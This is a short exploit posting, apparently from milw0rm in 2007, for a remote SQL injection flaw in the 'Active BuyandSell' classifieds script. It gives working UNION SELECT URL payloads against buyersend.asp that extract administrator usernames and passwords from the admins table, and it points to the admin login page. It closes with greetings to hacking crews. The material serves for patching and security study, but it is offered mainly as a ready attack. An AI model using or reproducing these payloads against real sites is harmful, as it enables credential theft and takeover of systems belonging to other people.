#Title : Active BuyandSell Remote SQL Injection Vulnerability #Author : CyberGhost #Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell #Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8 #Vuln. #Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins #Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins #Admin Login : /admin.asp ==================================== Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3 And All TURKISH HACKERS ! # milw0rm.com [2007-03-23]